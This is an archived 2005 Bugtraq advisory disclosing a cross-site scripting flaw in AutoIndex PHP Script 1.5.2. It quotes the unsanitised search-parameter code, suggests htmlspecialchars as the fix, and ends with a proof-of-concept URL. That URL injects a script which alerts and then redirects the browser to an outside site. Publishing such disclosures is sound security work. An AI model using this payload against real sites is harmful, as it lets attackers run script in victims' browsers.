lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 05 Jul 2005 22:29:24 +0000
From: mozako <mozako@...ox.it>
To: bugtraq@...urityfocus.com
Subject: Re: [badroot security] AutoIndex PHP Script: XSS vulnerability


Sorry for distraction errors.
This is the correct ADV:

_______________________________________________________

BADROOT SECURITY GROUP
Security Advisory 2005-#0x07
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
_______________________________________________________

Authors .......  mozako feat shen139
Date ..........  05-07-2005
Product .......  AutoIndex PHP Script
Type ..........  Cross Site Scripting (XSS) vulnerability

o Description:
=============================
AutoIndex PHP Script is a simply website directory indexer and file 
manager.

o Vulnerability Description:
=============================
287    [...]
288    $search = (isset($_GET['search']) ? $_GET['search'] : '');
289    $search_mode = (isset($_GET['searchMode']) ? $_GET['searchMode'] 
: '');
290    [...]

At line 289 AutoIndex PHP Script doesn't validate '$_GET' variable 
($search).
Consequently, a remote user can create an specially crafted
URL that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server.

o Products:
=============================
    - AutoIndex PHP Script v. 1.5.2 (tested)

o Solution:
=============================
Sanitize html source before writing it with a simply htmlspecialchars(...).

o Proof of concept:
=============================
http://www.vuln-site.org/index.php?search='>%3Cscript%3Ealert%28%27owned%27%29%3Blocation.href%3D%27http%3A%2F%2Fwww.badroot.org%27%3B%3C%2Fscript%3E&dir=&searchMode= 


Original ADV: http://www.badroot.org/advisories/SA0x07

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ